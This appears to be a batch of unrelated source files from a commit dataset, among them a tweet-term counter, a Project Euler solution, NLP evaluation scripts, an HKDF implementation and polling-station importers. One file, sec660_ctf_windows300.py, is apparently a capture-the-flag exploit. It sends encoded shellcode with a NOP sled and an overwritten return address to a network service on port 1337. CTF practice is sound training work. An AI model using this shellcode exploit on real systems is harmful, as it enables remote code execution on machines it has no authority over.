tweet = json.loads(line)
terms_hash = [term for term in preprocess(tweet['text'])
if term not in stop if term.startswith('#')]
count_all.update(terms_hash)
print(count_all.most_common(number))
#Find most common mentions
def mentions_only(fname, number):
with open(fname, 'r') as f:
count_all = Counter()
for line in f:
tweet = json.loads(line)
terms_mentions = [term for term in preprocess(tweet['text'])
if term not in stop if term.startswith('@')]
count_all.update(terms_mentions)
print(count_all.most_common(number))
#Find most common two-term occurances
def cooccurances(fname, number):
with open(fname, 'r') as f:
com = collections.defaultdict(lambda: collections.defaultdict(int))
for line in f:
tweet = json.loads(line)
terms_only = [term for term in preprocess(tweet['text'])
if term not in stop and not term.startswith(('#', '@'))]
for i in range(len(terms_only)):
for j in range(i+1, len(terms_only)):
w1, w2 = sorted([terms_only[i], terms_only[j]])
if w1 != w2:
com[w1][w2] += 1
com_max = []
for t1 in com:
t1_max_terms = sorted(com[t1].items(), key=operator.itemgetter(1), reverse=True)[:number]
for t2, t2_count in t1_max_terms:
com_max.append(((t1, t2), t2_count))
terms_max = sorted(com_max, key=operator.itemgetter(1), reverse=True)
print(terms_max[:number])
#Main Function Begins
if __name__ == "__main__":
fname = "tweets.json"
number = 10
print "Terms only"
terms_only(fname, number)
print "\nHashtags only"
hash_only(fname, number)
print "\nMentions only"
mentions_only(fname, number)
print "\nCooccurances"
cooccurances(fname, number)
| mit | Python |
|
e39bce6ba02ad4ed3c20768c234606afb48ac86a | Solve Largest Product | rootulp/hackerrank,rootulp/hackerrank,rootulp/hackerrank,rootulp/hackerrank,rootulp/hackerrank,rootulp/hackerrank | python/euler008.py | python/euler008.py | #!/bin/python3
import sys
from functools import reduce
class LargestProduct:
def __init__(self, num, num_consecutive_digits):
self.num = num
self.num_consecutive_digits = num_consecutive_digits
def largest_product(self):
return max(map(LargestProduct.product, LargestProduct.slices(LargestProduct.digits(self.num), self.num_consecutive_digits)))
@staticmethod
def slices(array, slice_length):
return [array[i:i + slice_length] for i in range(len(array) - slice_length)]
@staticmethod
def digits(num):
return [int(x) for x in str(num)]
@staticmethod
def product(array):
return reduce((lambda x, y: x * y), array)
t = int(input().strip())
for a0 in range(t):
_, num_consecutive_digits = map(int, input().strip().split(' '))
num = input().strip()
lp = LargestProduct(num, num_consecutive_digits)
print (lp.largest_product())
| mit | Python |
|
8c14684667b48921987f833f41727d036a3fe9f7 | Add SICK evaluation script in python | kovvalsky/LangPro,kovvalsky/LangPro,kovvalsky/LangPro,kovvalsky/LangPro | python/evaluate.py | python/evaluate.py | #!/usr/bin/env python
# -*- coding: utf8 -*-
import argparse
import re
from collections import Counter
#################################
def parse_arguments():
parser = argparse.ArgumentParser(description="Evaluate predictions against gold labels.")
parser.add_argument(
'sys', metavar='FILE', help='File with problem ID, white space and label per line')
parser.add_argument(
'gld', metavar='FILE', help="File with gold label. The format might vary")
# meta parameters
parser.add_argument(
'-v', '--verbose', dest='v', default=0, type=int, metavar='N', help='verbosity level of reporting')
args = parser.parse_args()
return args
#################################
def read_id_labels(filepath, pattern="(\d+)\s+(NEUTRAL|CONTRADICTION|ENTAILMENT)"):
'''Read a list of (ID, label) pairs from the file'''
id_labels = dict()
with open(filepath) as f:
for line in f:
m = re.search(pattern, line)
if m: id_labels[m.group(1)] = m.group(2)
return id_labels
#################################
def draw_conf_matrix(counter, labs=['ENTAILMENT', 'CONTRADICTION', 'NEUTRAL']):
'''Draw a confusion matrix for labels from two sources'''
print(f"{63*'-'}\n{'':15} {labs[0]:>15} {labs[1]:>15} {labs[2]:>15}\n{63*'-'}")
for gld in labs:
print(f"{gld:>15}", end=' ')
for sys in labs:
print(f"{counter[(sys, gld)]:>15}", end=' ')
print()
print(63*'-')
#################################
def calc_measures(counter, labs=['ENTAILMENT', 'CONTRADICTION', 'NEUTRAL']):
'''Calculate various measures'''
m = dict()
diag = sum([ counter[(l,l)] for l in labs ])
total = sum(counter.values())
m['accuracy'] = 100.0*diag / total
# precision and recall as C & E positives
diagEC = sum([ counter[(l,l)] for l in labs[:2] ])
sys_neut = sum([ counter[(labs[2],l)] for l in labs ])
gld_neut = sum([ counter[(l,labs[2])] for l in labs ])
m['precision'] = 100.0*diagEC / (total - sys_neut)
m['recall'] = 100.0*diagEC / (total - gld_neut)
return m
#################################
if __name__ == '__main__':
args = parse_arguments()
sys_ans = read_id_labels(args.sys)
gld_ans = read_id_labels(args.gld, pattern="^(\d+)\s+.+(NEUTRAL|CONTRADICTION|ENTAILMENT)$")
assert len(sys_ans) == len(gld_ans),\
f"The sources contain different number of problems ({len(sys_ans)} vs {len(gld_ans)})"
lab_pairs = [ (sys_ans[k], gld_ans[k]) for k in sys_ans ]
counter = Counter(lab_pairs)
draw_conf_matrix(counter)
m = calc_measures(counter)
for name in sorted(m.keys()):
print(f"{name:<12}: {m[name]:4.2f}%")
| bsd-3-clause | Python |
|
cd239be7ec84ccb000992841700effeb4bc6a508 | Add quickstart fabfile.py | petchat/streamparse,petchat/streamparse,msmakhlouf/streamparse,Parsely/streamparse,scrapinghub/streamparse,eric7j/streamparse,codywilbourn/streamparse,Parsely/streamparse,petchat/streamparse,hodgesds/streamparse,eric7j/streamparse,crohling/streamparse,msmakhlouf/streamparse,petchat/streamparse,hodgesds/streamparse,msmakhlouf/streamparse,crohling/streamparse,scrapinghub/streamparse,scrapinghub/streamparse,phanib4u/streamparse,scrapinghub/streamparse,msmakhlouf/streamparse,codywilbourn/streamparse,petchat/streamparse,scrapinghub/streamparse,phanib4u/streamparse,msmakhlouf/streamparse | streamparse/bootstrap/project/fabfile.py | streamparse/bootstrap/project/fabfile.py | """fab env:prod deploy:wordcount"""
import json
from fabric.api import run, put, env as _env
from fabric.decorators import task
@task
def env(e=None):
"""Activate a particular environment from the config.json file."""
with open('config.json', 'r') as fp:
config = json.load(fp)
_env.hosts = config['envs'][e]['hosts']
@task
def deploy(topology=None):
"""Deploy a topology to a remote host. Deploying a streamparse topology
accomplishes two things:
1. Create an uberjar which contains all code.
2. Push the topology virtualenv requirements to remote.
3. Update virtualenv on host server.
4. Submit topology (in uberjar) to remote Storm cluster."""
pass
| apache-2.0 | Python |
|
7f7fbb94796134301ee5289fa447e8632f59c912 | Create sec660_ctf_windows300.py | timip/exploit | sec660_ctf_windows300.py | sec660_ctf_windows300.py | #!/usr/bin/python
import socket
import sys
import time
buf = ""
buf += "\xd9\xc5\xba\x43\xdc\xd1\x08\xd9\x74\x24\xf4\x5e\x31"
buf += "\xc9\xb1\x53\x31\x56\x17\x83\xee\xfc\x03\x15\xcf\x33"
buf += "\xfd\x65\x07\x31\xfe\x95\xd8\x56\x76\x70\xe9\x56\xec"
buf += "\xf1\x5a\x67\x66\x57\x57\x0c\x2a\x43\xec\x60\xe3\x64"
buf += "\x45\xce\xd5\x4b\x56\x63\x25\xca\xd4\x7e\x7a\x2c\xe4"
buf += "\xb0\x8f\x2d\x21\xac\x62\x7f\xfa\xba\xd1\x6f\x8f\xf7"
buf += "\xe9\x04\xc3\x16\x6a\xf9\x94\x19\x5b\xac\xaf\x43\x7b"
buf += "\x4f\x63\xf8\x32\x57\x60\xc5\x8d\xec\x52\xb1\x0f\x24"
buf += "\xab\x3a\xa3\x09\x03\xc9\xbd\x4e\xa4\x32\xc8\xa6\xd6"
buf += "\xcf\xcb\x7d\xa4\x0b\x59\x65\x0e\xdf\xf9\x41\xae\x0c"
buf += "\x9f\x02\xbc\xf9\xeb\x4c\xa1\xfc\x38\xe7\xdd\x75\xbf"
buf += "\x27\x54\xcd\xe4\xe3\x3c\x95\x85\xb2\x98\x78\xb9\xa4"
buf += "\x42\x24\x1f\xaf\x6f\x31\x12\xf2\xe7\xf6\x1f\x0c\xf8"
buf += "\x90\x28\x7f\xca\x3f\x83\x17\x66\xb7\x0d\xe0\x89\xe2"
buf += "\xea\x7e\x74\x0d\x0b\x57\xb3\x59\x5b\xcf\x12\xe2\x30"
buf += "\x0f\x9a\x37\xac\x07\x3d\xe8\xd3\xea\xfd\x58\x54\x44"
buf += "\x96\xb2\x5b\xbb\x86\xbc\xb1\xd4\x2f\x41\x3a\xcb\xf3"
buf += "\xcc\xdc\x81\x1b\x99\x77\x3d\xde\xfe\x4f\xda\x21\xd5"
buf += "\xe7\x4c\x69\x3f\x3f\x73\x6a\x15\x17\xe3\xe1\x7a\xa3"
buf += "\x12\xf6\x56\x83\x43\x61\x2c\x42\x26\x13\x31\x4f\xd0"
buf += "\xb0\xa0\x14\x20\xbe\xd8\x82\x77\x97\x2f\xdb\x1d\x05"
buf += "\x09\x75\x03\xd4\xcf\xbe\x87\x03\x2c\x40\x06\xc1\x08"
buf += "\x66\x18\x1f\x90\x22\x4c\xcf\xc7\xfc\x3a\xa9\xb1\x4e"
buf += "\x94\x63\x6d\x19\x70\xf5\x5d\x9a\x06\xfa\x8b\x6c\xe6"
buf += "\x4b\x62\x29\x19\x63\xe2\xbd\x62\x99\x92\x42\xb9\x19"
buf += "\xa2\x08\xe3\x08\x2b\xd5\x76\x09\x36\xe6\xad\x4e\x4f"
buf += "\x65\x47\x2f\xb4\x75\x22\x2a\xf0\x31\xdf\x46\x69\xd4"
buf += "\xdf\xf5\x8a\xfd"
buf1 = "B" * 10
buf2 = "\x90" * 100 + buf + "A" * (1932 - 100 - len(buf)) + "\xca\x12\x40\00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((sys.argv[1], 1337))
s.send(buf1 + '\r\n')
print s.recv(1024)
#time.sleep(30)
raw_input('Press enter to continue')
s.send(buf2 + '\r\n')
print s.recv(1024)
s.close()
| apache-2.0 | Python |
|
348b10962f12e1c49ed5c4caf06a838b89b1e5af | Create plasma.py | icfaust/TRIPPy,icfaust/TRIPPy | plasma.py | plasma.py | import geometry
| mit | Python |
|
bd05625c2e0a164f0b720c8c13fb06540d4fcdb9 | Create ica_demo.py (#496) | probml/pyprobml,probml/pyprobml,probml/pyprobml,probml/pyprobml | scripts/ica_demo.py | scripts/ica_demo.py | # Blind source separation using FastICA and PCA
# Author : Aleyna Kara
# This file is based on https://github.com/probml/pmtk3/blob/master/demos/icaDemo.m
from sklearn.decomposition import PCA, FastICA
import numpy as np
import matplotlib.pyplot as plt
import pyprobml_utils as pml
def plot_signals(signals, suptitle, file_name):
plt.figure(figsize=(8, 4))
for i, signal in enumerate(signals, 1):
plt.subplot(n_signals, 1, i)
plt.plot(signal)
plt.xlim([0, N])
plt.tight_layout()
plt.suptitle(suptitle)
plt.subplots_adjust(top=0.85)
pml.savefig(f'{file_name}.pdf')
plt.show()
# https://github.com/davidkun/FastICA/blob/master/demosig.m
def generate_signals():
v = np.arange(0, 500)
signals = np.zeros((n_signals, N))
signals[0, :] = np.sin(v/2) # sinusoid
signals[1, :] = ((v % 23 - 11) / 9)**5
signals[2, :] = ((v % 27 - 13)/ 9) # sawtooth
rand = np.random.rand(1, N)
signals[3, :] = np.where(rand < 0.5, rand * 2 -1, -1) * np.log(np.random.rand(1, N)) #impulsive noise
signals /= signals.std(axis=1).reshape((-1,1))
signals -= signals.mean(axis=1).reshape((-1,1))
A = np.random.rand(n_signals, n_signals) # mixing matrix
return signals, A @ signals
np.random.seed(0)
n_signals, N = 4, 500
signals, mixed_signals = generate_signals()
plot_signals(signals, 'Truth', 'ica-truth')
plot_signals(mixed_signals, 'Observed Signals', 'ica-obs')
pca = PCA(whiten=True, n_components=4)
signals_pca = pca.fit(mixed_signals.T).transform(mixed_signals.T)
ica = FastICA(algorithm='deflation', n_components=4)
signals_ica = ica.fit_transform(mixed_signals.T)
plot_signals(signals_pca.T, 'PCA estimate','ica-pca')
plot_signals(signals_ica.T, 'ICA estimate', 'ica-ica') | mit | Python |
|
a8add82f2f9092d07f9ef40420c4b303700c912d | add a 'uniq' function | StoDevX/cs251-toolkit,StoDevX/cs251-toolkit,StoDevX/cs251-toolkit,StoDevX/cs251-toolkit | lib/uniq.py | lib/uniq.py | # from http://www.peterbe.com/plog/uniqifiers-benchmark
def identity(x):
return x
def uniq(seq, idfun=identity):
# order preserving
seen = {}
result = []
for item in seq:
marker = idfun(item)
if marker in seen:
continue
seen[marker] = True
result.append(item)
return result
| mit | Python |
|
c57c672aae98fb5b280f70b68ac27fc2d94a243f | Add test class to cover the RandomForestClassifier in Go | nok/sklearn-porter | tests/estimator/classifier/RandomForestClassifier/RandomForestClassifierGoTest.py | tests/estimator/classifier/RandomForestClassifier/RandomForestClassifierGoTest.py | # -*- coding: utf-8 -*-
from unittest import TestCase
from sklearn.ensemble import RandomForestClassifier
from tests.estimator.classifier.Classifier import Classifier
from tests.language.Go import Go
class RandomForestClassifierGoTest(Go, Classifier, TestCase):
def setUp(self):
super(RandomForestClassifierGoTest, self).setUp()
self.estimator = RandomForestClassifier(n_estimators=100,
random_state=0)
def tearDown(self):
super(RandomForestClassifierGoTest, self).tearDown()
| bsd-3-clause | Python |
|
e045a7bd1c3d791de40412bafa62702bee59132e | Add Python solution for day 15. | Mark-Simulacrum/advent-of-code-2015,Mark-Simulacrum/advent-of-code-2015,Mark-Simulacrum/advent-of-code-2015,Mark-Simulacrum/advent-of-code-2015 | day15/solution.py | day15/solution.py |
data = open("data", "r").read()
ingredients = []
for line in data.split("\n"):
name = line.split(": ")[0]
properties = line.split(": ")[1].split(", ")
props = { 'value': 0 }
for prop in properties:
props[prop.split(" ")[0]] = int(prop.split(" ")[1])
ingredients.append(props)
def getPropertyScore(property, ingredients):
value = 0
for ingredient in ingredients:
value += ingredient[property] * ingredient['value']
if value <= 0:
return 0
else:
return value
def calculateScore(ingredients):
score = getPropertyScore("capacity", ingredients)
score *= getPropertyScore("durability", ingredients)
score *= getPropertyScore("flavor", ingredients)
score *= getPropertyScore("texture", ingredients)
calories = getPropertyScore("calories", ingredients)
return score, calories
def addValue(ingredient, value):
ingredient['value'] = value
return ingredient
maxScore = -100
optionsTried = 0
for i in xrange(1, 100):
for j in xrange(1, 100 - i):
for k in xrange(1, 100 - i - j):
h = 100 - i - j - k
scoreInput = [
addValue(ingredients[0], i),
addValue(ingredients[1], j),
addValue(ingredients[2], k),
addValue(ingredients[3], h)
]
score, calories = calculateScore(scoreInput)
if calories == 500 and maxScore < score:
maxScore = score
optionsTried += 1
print "maxScore:", maxScore
print "optionsTried:", optionsTried
| mit | Python |
|
df68e5aa8ab620f03c668ae886ed8a1beef3c697 | Add HKDF-SHA256 implementation. | isislovecruft/scramblesuit,isislovecruft/scramblesuit | hkdf-sha256.py | hkdf-sha256.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from Crypto.Hash import HMAC
from Crypto.Hash import SHA256
import obfsproxy.transports.base as base
import math
class HKDF_SHA256( object ):
"""
Implements HKDF using SHA256: https://tools.ietf.org/html/rfc5869
This class only implements the `expand' but not the `extract' stage.
"""
def __init__( self, prk, info="", length=32 ):
self.HashLen = 32
if length > (self.HashLen * 255):
raise ValueError("The OKM's length cannot be larger than %d." % \
(self.HashLen * 255))
if len(prk) < self.HashLen:
raise ValueError("The PRK must be at least %d bytes in length." % \
self.HashLen)
self.N = math.ceil(float(length) / self.HashLen)
self.prk = prk
self.info = info
self.length = length
self.ctr = 1
self.T = ""
def expand( self ):
"""Expands, based on PRK, info and L, the given input material to the
output key material."""
tmp = ""
# Prevent the accidental re-use of output keying material.
if len(self.T) > 0:
raise base.PluggableTransportError("HKDF-SHA256 OKM must not " \
"be re-used by application.")
while self.length > len(self.T):
tmp = HMAC.new(self.prk, tmp + self.info + chr(self.ctr),
SHA256).digest()
self.T += tmp
self.ctr += 1
return self.T[:self.length]
| bsd-3-clause | Python |
|
7cf5f0a4e2b7c8e83f26ea3f9170c5ee0e7bbdbb | make it easier to compare/validate models | et-al-Health/parserator,yl2695/parserator,datamade/parserator | parserator/spotcheck.py | parserator/spotcheck.py | import pycrfsuite
def compareTaggers(model1, model2, string_list, module_name):
"""
Compare two models. Given a list of strings, prints out tokens & tags
whenever the two taggers parse a string differently. This is for spot-checking models
:param tagger1: a .crfsuite filename
:param tagger2: another .crfsuite filename
:param string_list: a list of strings to be checked
:param module_name: name of a parser module
"""
module = __import__(module_name)
tagger1 = pycrfsuite.Tagger()
tagger1.open(module_name+'/'+model1)
tagger2 = pycrfsuite.Tagger()
tagger2.open(module_name+'/'+model2)
count_discrepancies = 0
for string in string_list:
tokens = module.tokenize(string)
if tokens:
features = module.tokens2features(tokens)
tags1 = tagger1.tag(features)
tags2 = tagger2.tag(features)
if tags1 != tags2:
count_discrepancies += 1
print '\n'
print "%s. %s" %(count_discrepancies, string)
print '-'*75
print_spaced('token', model1, model2)
print '-'*75
for token in zip(tokens, tags1, tags2):
print_spaced(token[0], token[1], token[2])
print "\n\n%s of %s strings were labeled differently"%(count_discrepancies, len(string_list))
def print_spaced(s1, s2, s3):
n = 25
print s1 + " "*(n-len(s1)) + s2 + " "*(n-len(s2)) + s3
def validateTaggers(model1, model2, labeled_string_list, module_name):
module = __import__(module_name)
tagger1 = pycrfsuite.Tagger()
tagger1.open(module_name+'/'+model1)
tagger2 = pycrfsuite.Tagger()
tagger2.open(module_name+'/'+model2)
wrong_count_1 = 0
wrong_count_2 = 0
wrong_count_both = 0
correct_count = 0
for labeled_string in labeled_string_list:
unlabeled_string, components = labeled_string
tokens = module.tokenize(unlabeled_string)
if tokens:
features = module.tokens2features(tokens)
_, tags_true = zip(*components)
tags_true = list(tags_true)
tags1 = tagger1.tag(features)
tags2 = tagger2.tag(features)
if (tags1 != tags_true) and (tags2 != tags_true):
print "\nSTRING: ", unlabeled_string
print "TRUE: ", tags_true
print "*%s: "%model1, tags1
print "*%s: "%model2, tags2
wrong_count_both += 1
elif (tags1 != tags_true):
print "\nSTRING: ", unlabeled_string
print "TRUE: ", tags_true
print "*%s: "%model1, tags1
print "%s: "%model2, tags2
wrong_count_1 += 1
elif (tags2 != tags_true):
print "\nSTRING: ", unlabeled_string
print "TRUE: ", tags_true
print "%s: "%model1, tags1
print "*%s: "%model2, tags2
wrong_count_2 += 1
else:
correct_count += 1
print "\n\nBOTH WRONG: ", wrong_count_both
print "%s WRONG: %s" %(model1, wrong_count_1)
print "%s WRONG: %s" %(model2, wrong_count_2)
print "BOTH CORRECT: ", correct_count
| mit | Python |
|
d4adf3e0e177e80ce7bc825f1cb4e461e5551b2f | Add basic configuration support to oonib | juga0/ooni-probe,Karthikeyan-kkk/ooni-probe,kdmurray91/ooni-probe,lordappsec/ooni-probe,kdmurray91/ooni-probe,0xPoly/ooni-probe,lordappsec/ooni-probe,juga0/ooni-probe,0xPoly/ooni-probe,0xPoly/ooni-probe,Karthikeyan-kkk/ooni-probe,kdmurray91/ooni-probe,Karthikeyan-kkk/ooni-probe,0xPoly/ooni-probe,juga0/ooni-probe,juga0/ooni-probe,kdmurray91/ooni-probe,lordappsec/ooni-probe,lordappsec/ooni-probe,Karthikeyan-kkk/ooni-probe | oonib/config.py | oonib/config.py | from ooni.utils import Storage
import os
# XXX convert this to something that is a proper config file
main = Storage()
main.reporting_port = 8888
main.http_port = 8080
main.dns_udp_port = 5354
main.dns_tcp_port = 8002
main.daphn3_port = 9666
main.server_version = "Apache"
#main.ssl_private_key = /path/to/data/private.key
#main.ssl_certificate = /path/to/data/certificate.crt
#main.ssl_port = 8433
helpers = Storage()
helpers.http_return_request_port = 1234
daphn3 = Storage()
daphn3.yaml_file = "/path/to/data/oonib/daphn3.yaml"
daphn3.pcap_file = "/path/to/data/server.pcap"
| bsd-2-clause | Python |
|
58f05fe7736ce387bb8086128bc9de32b8cd6a59 | Add simplify.py | indico/indico-plugins,ThiefMaster/indico-plugins,ThiefMaster/indico-plugins,indico/indico-plugins,indico/indico-plugins,ThiefMaster/indico-plugins,ThiefMaster/indico-plugins,indico/indico-plugins | livesync/indico_livesync/simplify.py | livesync/indico_livesync/simplify.py | # This file is part of Indico.
# Copyright (C) 2002 - 2014 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from indico_livesync.models.queue import ChangeType
def process_records(records):
changes = {}
for record in records:
if record.type != ChangeType.deleted and record.object is None:
continue
if record.type == ChangeType.created:
changes[record.obj] = ChangeType.type
elif record.type == ChangeType.deleted:
changes[record.obj] = ChangeType.type
elif record.type in {ChangeType.moved, ChangeType.protection_changed}:
changes.update(_cascade_change(record))
elif record.type == ChangeType.title_changed:
pass
elif record.type == ChangeType.data_changed and not record.category_id:
changes[record.obj] = ChangeType.type
for obj, state in records.iteritems():
pass
def _cascade_change(record):
changes = {record.obj: record.type}
for subrecord in record.subrecords():
changes.update(_cascade_change(subrecord))
return changes
| mit | Python |
|
6a65d102bfcd667c382704ea3430d76faaa1b3d1 | Add tests | looplab/salut | tests/test_salut.py | tests/test_salut.py | import unittest
from mock import MagicMock
import socket
import gevent
import gevent.socket
from otis.common.salut import Announcer, Browser
class TestSalut(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_announce(self):
announcer = Announcer('Test', '_otis_test._tcp', 9999)
while not announcer.announced:
gevent.sleep(0.05)
announcer.stop()
def test_announce_registered_callback(self):
callback = MagicMock()
announcer = Announcer(
'Test', '_otis_test._tcp', 9999, callback.registered)
while not announcer.announced:
gevent.sleep(0.05)
callback.registered.assert_called_once_with(
'local.', '_otis_test._tcp.', 'Test')
announcer.stop()
def test_browse(self):
announcer = Announcer('Test', '_otis_test._tcp', 9999)
while not announcer.announced:
gevent.sleep(0.05)
browser = Browser(
'Test', '_otis_test._tcp')
while not browser.resolved:
gevent.sleep(0.05)
browser.stop()
announcer.stop()
def test_browse_resolved_callback(self):
ip = gevent.socket.gethostbyname(socket.gethostname())
port = 9999
announcer = Announcer('Test', '_otis_test._tcp', port)
while not announcer.announced:
gevent.sleep(0.05)
callback = MagicMock()
browser = Browser(
'Test', '_otis_test._tcp',
resolved_callback=callback.resolved)
while not browser.resolved:
gevent.sleep(0.05)
callback.resolved.assert_called_once_with(ip, port)
browser.stop()
announcer.stop()
def test_browse_unresolved_callback(self):
announcer = Announcer('Test', '_otis_test._tcp', 9999)
while not announcer.announced:
gevent.sleep(0.05)
callback = MagicMock()
browser = Browser(
'Test', '_otis_test._tcp',
unresolved_callback=callback.unresolved)
while not browser.resolved:
gevent.sleep(0.05)
announcer.stop()
while announcer.announced:
gevent.sleep(0.05)
announcer = None
while browser.resolved:
gevent.sleep(0.05)
callback.unresolved.assert_called_once()
browser.stop()
def test_unresolve_resolve(self):
announcer = Announcer('Test', '_otis_test._tcp', 9999)
while not announcer.announced:
gevent.sleep(0.05)
browser = Browser('Test', '_otis_test._tcp')
while not browser.resolved:
gevent.sleep(0.05)
announcer.stop()
while announcer.announced:
gevent.sleep(0.05)
announcer = None
while browser.resolved:
gevent.sleep(0.05)
announcer = Announcer('Test', '_otis_test._tcp', 9999)
while not announcer.announced:
gevent.sleep(0.05)
while not browser.resolved:
gevent.sleep(0.05)
browser.stop()
| apache-2.0 | Python |
|
f65a6c12dd615d235a306b130ebd63358429e8c6 | Create boss.py | PixelIndigo/ctfsolutions | boss.py | boss.py | # -*- coding: utf-8 -*-
import urllib
import urllib2
import re
from cookielib import CookieJar
reg = re.compile(r'href="\.\/in[^"\\]*(?:\\.[^"\\]*)*"')
stager = re.compile(r'>.+100.')
answers = {1: '/index.php?answer=42', 2: '/index.php?answer=bt'}
wrong = set()
cj = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
response = opener.open("http://maze.qctf.ru/index.php")
content = response.read()
stage = int(stager.findall(content)[0][1:-6])
chosen = answers[1]
response = opener.open("http://maze.qctf.ru"+answers[1])
prev_stage = 1
while True:
content = response.read()
stage = int(stager.findall(content)[0][1:-6])
if stage == prev_stage+1:
if stage > len(answers):
print content
print "Stage "+str(stage)
print "Success "+str(stage-1)+" with "+chosen
answers[stage-1] = chosen
else:
wrong.add(chosen)
if len(answers) < stage:
v = [x[7:-1] for x in reg.findall(content)]
for x in v:
if x not in wrong:
chosen = x
break
response = opener.open("http://maze.qctf.ru"+chosen)
else:
chosen = answers[stage]
response = opener.open("http://maze.qctf.ru"+answers[stage])
prev_stage = stage
| unlicense | Python |
|
df7235e13c14f13dd27ede6c098a9b5b80b4b297 | Add test_functions | juliakreutzer/bandit-neuralmonkey,bastings/neuralmonkey,ufal/neuralmonkey,ufal/neuralmonkey,ufal/neuralmonkey,juliakreutzer/bandit-neuralmonkey,juliakreutzer/bandit-neuralmonkey,juliakreutzer/bandit-neuralmonkey,ufal/neuralmonkey,ufal/neuralmonkey,bastings/neuralmonkey,bastings/neuralmonkey,juliakreutzer/bandit-neuralmonkey,bastings/neuralmonkey,bastings/neuralmonkey | neuralmonkey/tests/test_functions.py | neuralmonkey/tests/test_functions.py | #!/usr/bin/env python3
"""Unit tests for functions.py."""
# tests: mypy, lint
import unittest
import tensorflow as tf
from neuralmonkey.functions import piecewise_function
class TestPiecewiseFunction(unittest.TestCase):
def test_piecewise_constant(self):
x = tf.placeholder(dtype=tf.int32)
y = piecewise_function(x, [-0.5, 1.2, 3, 2], [-1, 2, 1000],
dtype=tf.float32)
with tf.Session() as sess:
self.assertAlmostEqual(sess.run(y, {x: -2}), -0.5)
self.assertAlmostEqual(sess.run(y, {x: -1}), 1.2)
self.assertAlmostEqual(sess.run(y, {x: 999}), 3)
self.assertAlmostEqual(sess.run(y, {x: 1000}), 2)
self.assertAlmostEqual(sess.run(y, {x: 1001}), 2)
if __name__ == "__main__":
unittest.main()
| bsd-3-clause | Python |
|
b2acb7dfd7dc08afd64d80f25ab0a76469e5fff6 | add import script for North Lanarkshire | DemocracyClub/UK-Polling-Stations,chris48s/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,chris48s/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,chris48s/UK-Polling-Stations | polling_stations/apps/data_collection/management/commands/import_north_lanarkshire.py | polling_stations/apps/data_collection/management/commands/import_north_lanarkshire.py | from data_collection.management.commands import BaseScotlandSpatialHubImporter
"""
Note:
This importer provides coverage for 173/174 districts
due to incomplete/poor quality data
"""
class Command(BaseScotlandSpatialHubImporter):
council_id = 'S12000044'
council_name = 'North Lanarkshire'
elections = ['local.north-lanarkshire.2017-05-04']
def station_record_to_dict(self, record):
# clean up codes
record[1] = self.parse_string(record[1]).replace(' ', '').upper()
return super().station_record_to_dict(record)
def district_record_to_dict(self, record):
# clean up codes
record[0] = self.parse_string(record[0]).replace(' ', '').upper()
return super().district_record_to_dict(record)
| bsd-3-clause | Python |
|
cc907c9b8f22bd08ed6460e5e99ebb4e8ce5a499 | add import script for Perth and Kinross | DemocracyClub/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,chris48s/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,chris48s/UK-Polling-Stations,chris48s/UK-Polling-Stations | polling_stations/apps/data_collection/management/commands/import_perth_and_kinross.py | polling_stations/apps/data_collection/management/commands/import_perth_and_kinross.py | from data_collection.management.commands import BaseScotlandSpatialHubImporter
"""
Note:
This importer provides coverage for 104/107 districts
due to incomplete/poor quality data
"""
class Command(BaseScotlandSpatialHubImporter):
council_id = 'S12000024'
council_name = 'Perth and Kinross'
elections = ['local.perth-and-kinross.2017-05-04']
| bsd-3-clause | Python |
|
a9ed1a52a552d76246028d892cc6d01e5ac069cf | Move sidecar to api | polyaxon/polyaxon,polyaxon/polyaxon,polyaxon/polyaxon | api/events/monitors/sidecar.py | api/events/monitors/sidecar.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import logging
import os
import time
from django.conf import settings
from polyaxon_k8s.constants import PodLifeCycle
from polyaxon_k8s.manager import K8SManager
from api.config_settings import CeleryPublishTask
from api.celery_api import app as celery_app
from libs.redis_db import RedisToStream
from events.tasks import handle_events_job_logs
logger = logging.getLogger('polyaxon.monitors.sidecar')
def run(k8s_manager, pod_id, job_id):
raw = k8s_manager.k8s_api.read_namespaced_pod_log(pod_id,
k8s_manager.namespace,
container=job_id,
follow=True,
_preload_content=False)
for log_line in raw.stream():
experiment_id = 0 # TODO extract experiment id
logger.info("Publishing event: {}".format(log_line))
handle_events_job_logs.delay(experiment_id=experiment_id,
job_id=job_id,
log_line=log_line,
persist=settings.PERSIST_EVENTS)
if (RedisToStream.is_monitored_job_logs(job_id) or
RedisToStream.is_monitored_experiment_logs(experiment_id)):
celery_app.send_task(CeleryPublishTask.PUBLISH_LOGS_SIDECAR,
kwargs={'experiment_id': experiment_id,
'job_id': job_id,
'log_line': log_line})
def can_log(k8s_manager, pod_id):
status = k8s_manager.k8s_api.read_namespaced_pod_status(pod_id,
k8s_manager.namespace)
logger.debug(status)
while status.status.phase != PodLifeCycle.RUNNING:
time.sleep(settings.LOG_SLEEP_INTERVAL)
status = k8s_manager.k8s_api.read_namespaced_pod_status(pod_id,
k8s_manager.namespace)
def main():
pod_id = os.environ['POLYAXON_POD_ID']
job_id = os.environ['POLYAXON_JOB_ID']
k8s_manager = K8SManager(namespace=settings.NAMESPACE, in_cluster=True)
can_log(k8s_manager, pod_id)
run(k8s_manager, pod_id, job_id)
logger.debug('Finished logging')
if __name__ == '__main__':
main()
| apache-2.0 | Python |
|
